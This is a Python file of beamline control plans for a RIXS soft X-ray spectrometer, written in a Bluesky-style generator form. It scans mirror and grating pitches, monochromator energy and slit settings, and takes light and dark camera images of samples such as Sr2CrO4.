#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m6_pit_optimization2_centroid(num_scan):
#according to joe's calcs, 0.5mrad makes a signf change. this is 0.028 deg in m6
# beyond +/- 0.25deg it could be very difficult to see something...especially if focusing well.
precison_digit = 4
gr_pit=round(espgm.grpit.user_readback.value,precison_digit)
extra_md = 'gr = {}'.format(gr_pit)
#NOTE : grating:m7
m7_dict={6.2476:5.7229}
x_motor=m6.pit
x_ideal= 1.3777
x_start= x_ideal+5*.001
x_stop= x_ideal-5*.001
y_motor=espgm.m7pit
y_ideal = m7_dict[gr_pit]
y_start= y_ideal+5*.001
y_stop= y_ideal-5*.001
num = 11
f_string=''
yield from count([rixscam], num=1)
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
yield from sleep(10)
for i in range(num_scan):
uid = yield from count([rixscam],num=1, md = {'reason':'{} m6 first order focus - 20um vg'.format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_gr_m6_pit_optimization2():
yield from align.m1pit
yield from m3_check()
gr_list = [5.4945, 5.5945, 5.6945, 5.7945, 5.8945]
for gr in gr_list:
yield from mv(espgm.grpit, gr)
yield from rixscam_m6_pit_optimization2()
def rixscam_m7_gr_2_axis( extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
#y_ideal= 4.8445#5.5349
#y_start = 4.7971#4.7813#5.4959
#y_stop = 4.8919#5.5734
y_ideal = 5.086414
y_start = 5.036414
y_stop = 5.136414
x_motor= espgm.grpit
#x_ideal= 4.9281#6.2368
#x_start= 4.8981#4.8881#6.2168
#x_stop= 4.9581#6.2568
x_ideal= 5.2939
x_start= 5.2639
x_stop = 5.3229
num= 14 #12
f_string=''
yield from count([rixscam,sclr], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
#yield from mv(gvbt1,'open')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvbt1,'close')
#yield from mv(gvbt1,'open')
#yield from mv(gvsc1,'close')
#uid = yield from count([rixscam,sclr],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal,y_motor, y_ideal)
#yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
#uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_gr_2_axis_centroid_temp(cts, num_scans=1, extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
#y_ideal= 4.8445#5.5349
#y_start = 4.7971#4.7813#5.4959
#y_stop = 4.8919#5.5734
y_ideal = 5.3915
y_start = 5.3915-0.004*6
y_stop = 5.3915+0.004*6
x_motor= espgm.grpit
#x_ideal= 4.9281#6.2368
#x_start= 4.8981#4.8881#6.2168
#x_stop= 4.9581#6.2568
x_ideal= 6.0139
x_start= 6.0139-0.002*6
x_stop = 6.0139+0.002*6
num= 13
f_string=''
#yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
for s in range(num_scans):
uid = yield from count([rixscam],num=cts, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_gr_2_axis_v1( extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
y_ideal= 5.543500
y_list = [5.3433,5.5433,5.7303,5.9003]
x_motor= espgm.grpit
x_ideal= 6.238500
x_list=[6.1385,6.2385,6.3385,6.4385]
num= 4 #12
f_string=''
yield from mv(rixscam.cam.acquire_time, 300)
yield from count([rixscam,sclr], md = {'reason':'dummy'})
for i in range(num):
x_val = x_list[i]
y_val = y_list[i]
yield from mv (x_motor,x_val,y_motor,y_val)
yield from mv(gvbt1,'open')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal,y_motor, y_ideal)
yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
#uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_cff_m7_gr():
#cffs = [2.22,2.24,2.25,2.26,2.27,2.28,2.29,2.30,2.32,2.34] # for mbg
cffs = [2.10,2.12,2.14,2.16,2.18,2.20,2.22,2.24,2.26] # for mbg
#yield from mv(sclr.preset_time, 180)
#yield from mv(extslt.vg, 10)
#extslt_vg = np.round(extslt.vg.user_readback.value,1)
#yield from mv(rixscam.cam.acquire_time, 180)
for cff in cffs:
yield from mv(pgm.cff, cff)#Fcryo_z
yield from sleep(10)
yield from mv(pgm.en, 1085)
#yield from rixscam_m7_gr_2_axis(extra_md = np.str(cff)+np.str(extslt_vg))
#yield from mv(sclr.preset_time, 1)
yield from mv(rixscam.cam.acquire_time, 5)
#yield from count([rixscam,sclr])
yield from count([rixscam])
def rixscam_pgm_en(extra_md = '' ):
"""
Looks like 50um extslt_vg is typical.
"""
x_motor=pgm.en
x_ideal = 1095 #462 #852.4 #1250lmm
x_start = 1060 #451 #821.4 #1250lmm
x_stop = 1130 #465
num = 6 #8
cts=60
#yield from m1m3_max()
extslt_vg_value = np.round(extslt.vg.user_readback.value,0)
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md={'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 2)
yield from mv (x_motor,x_val)
uid = yield from count([rixscam, ring_curr], num=cts, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
yield from mv(x_motor,x_ideal)
def rixscam_m4slt(extra_md = '1800 + 2500 set' ):
vgs = [1]
hgs = [1.5]
eslt = [10]
num=4
extslt_vg_value = np.round(extslt.vg.user_readback.value,0)
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md={'reason':'dummy'})
for i in range(num):
#x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 2)
#yield from mv (x_motor,x_val)
uid = yield from count([rixscam],num=1, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = '# + str(x_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv(rixscam.cam.acquire_time, 5)
yield from count([rixscam],num=1, md = {'reason':'dummy'})
print (f_string)
#yield from mv(x_motor,x_ideal)
def rixscam_energies(extra_md = '' ):
yield from mv(extslt.vg,30)
yield from pol_H()
f_string=''
yield from mv(espgm.m7pit,5.4210)
i = 576.5
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
i = 579.3
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
i = 580.5
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
def rixscam_acquire(detectors
, Ei_vals, m7_pit_vals, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
detectors: list
detectors to be used with rixs spectra
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value
if None, m7 pitch is not adjusted
num_rixs_im : integer
number of RIXS befove every beamline alignment
pol_type = None, 'H', or 'V'
polarization H, or V, offset are already assumed and need to be updated
extra_md = string
optional, note to be added to rixs light image data
"""
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type == None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
if np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
print('Checking m7 now')
if m7_pit_vals != None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, repectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count(detectors, md = {'reason':'dummy'})
print('Ya dumnmy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals != None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
yield from mvr(cryo.y,-0.005)
print('\t\tTaking Lights for RIXS REALLY')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count(detectors,num=1, md = {'reason':'{}'. format(md_string)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} - E = {:3.3f}eV - Pol {}'. format(extra_md, Ei_vals[i], pol_type)})
if uid == None:
uid = db[-1].start['scan_id']#+1+j+scan_num_cor
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
#print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
yield from mv(gvbt1,'close')
#DARKS
#yield from mv(gvbt1,'open')
#yield from mv(gvsc1,'close')
#for i in range(0,2):
#uid = yield from count(detectors,num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
#print(f_string)
#print('\n\n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
def rixscam_acquire_sample_c_tape(Ei_vals, m7_pit_vals, sample, c_tape, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value
if None, m7 pitch is not adjusted
num_rixs_im : integer
number of RIXS befove every beamline alignment
pol_type = None, 'H', or 'V'
polarization H, or V, offset are already assumed and need to be updated
extra_md = string
optional, note to be added to rixs light image data
"""
print('\n\n\tEnsuring beamline exit slit vertical gap is at 20 um\n\n')
yield from mv(extslt.vg,20, extslt.hg, 150)
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type == None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
if np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
print('Checking m7 now')
if m7_pit_vals != None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, repectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count([rixscam], md = {'reason':'dummy'})
print('Ya dumnmy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals != None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
#SAMPLE POSITION
yield from mv(cryo.x,sample[0])
yield from mv(cryo.y,sample[1]-0.002*i)
yield from mv(cryo.z,sample[2])
print('\t\tTaking RIXS from the SAMPLE')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam,qem11,qem12],num=1, md = {'reason':'{}'. format(md_string)})
if uid == None:
uid = db[-1].start['scan_id']
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
#print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
#C-tape POSITION
yield from mv(cryo.x,c_tape[0])
yield from mv(cryo.y,c_tape[1])
yield from mv(cryo.z,c_tape[2])
print('\t\tTaking RIXS from the C-tape')
md_string_2 = 'C - tape' + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam,qem11,qem12],num=1)
if uid == None:
uid = db[-1].start['scan_id']
f_string += 'scan no ' + str(uid) + ' ' + str(md_string_2) + '\n'
#print(md_string_2)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string_2) + '\n'
yield from mv(gvbt1,'close')
#DARKS
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,2):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print(f_string)
print('\n\n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
def rixscam_acquire_V2(Ei_vals, m7_pit_vals, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value
if None, m7 pitch is not adjusted
num_rixs_im : integer
number of RIXS befove every beamline alignment
pol_type = None, 'H', or 'V'
polarization H, or V, offset are already assumed and need to be updated
extra_md = string
optional, note to be added to rixs light image data
"""
print('\n\n\tEnsuring beamline exit slit vertical gap is at 20 um\n\n')
yield from mv(extslt.vg,20, extslt.hg, 150)
try:
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type == None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
if np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
raise
print('Checking m7 now')
if m7_pit_vals != None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, repectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count([rixscam], md = {'reason':'dummy'})
print('Ya dumnmy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals != None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
yield from mvr(cryo.y,-0.002)
print('\t\tTaking Lights for RIXS REALLY')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam],num=1, md = {'reason':'{}'. format(md_string)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} - E = {:3.3f}eV - Pol {}'. format(extra_md, Ei_vals[i], pol_type)})
if uid == None:
uid = db[-1].start['scan_id']#+1+j+scan_num_cor
f_string += 'scan no ' + str(uid) + str(md_string) + '\n'
print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(uid) + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
yield from mv(gvbt1,'close')
#DARKS
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,2):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print(f_string)
print('/n/n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
except Exception:
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print('OOPS! The plan stopped. The completed scans are:\n')
print(f_string)
print('\n\nEXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
def rixscam_test_LV_LH(extra_md = '' ):
yield from mvr(cryo.y, -0.01)
x_motor=pgm.en
x_val=579.5
yield from mv(x_motor,x_val)
yield from pol_H(4)
# yield from align.m1pit
# yield from m3_check()
yield from mv(gvbt1,'open')
yield from count([rixscam])
f_string=''
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = 579.5 eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + 'Pol H' '\n'
yield from mv(gvbt1,'close')
yield from pol_V(6)
# yield from align.m1pit
# yield from m3_check()
yield from mv(gvbt1,'open')
yield from count([rixscam])
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = 579.5 eV - Pol V'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + 'Pol V' '\n'
yield from mv(gvbt1,'close')
print (f_string)
yield from pol_H(4)
def rixscam_Ei_dep(extra_md = '' ):
yield from mv(extslt.vg,30)
yield from pol_H()
yield from align.m1pit
yield from m3_check()
f_string=''
yield from mv(espgm.m7pit,5.4210)
for i in np.arange(575,578,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
for i in np.arange(578,580,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
for i in np.arange(580,582.5,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#print(f_string)
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
yield from mv(pgm.en, 575)
yield from pol_V()
yield from sleep(300)
yield from align.m1pit
yield from m3_check()
f_string=''
yield from mv(espgm.m7pit,5.4210)
for i in np.arange(575,578,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
for i in np.arange(578,580,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
for i in np.arange(580,582.5,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
def rixscam_dc_z_optimization(extra_md = '' ):
x_motor= dc.z
x_ideal= 260
x_start= x_ideal + 12
x_stop= x_ideal - 12
num= 9 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
#yield from mv(gvbt1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(gvsc1,'close')
#uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_ideal) + '\n'#\
#' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_dc_z_optimization_centroid(num_scan):
x_motor= dc.z
x_ideal= 260
x_start= x_ideal + 12
x_stop= x_ideal - 12
num= 9 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
for i in range(num_scan):
uid = yield from count([rixscam],num=1)
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc.z = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_cff_optimization(extra_md = '' ):
x_motor= pgm.cff
y_motor= pgm.en
y_val= 1085
x_ideal= 2.26
x_start= x_ideal -0.16 #0.04#
x_stop= x_ideal +0.08 #0.04#
num= 13 #5 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvsc1,'close')
#uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
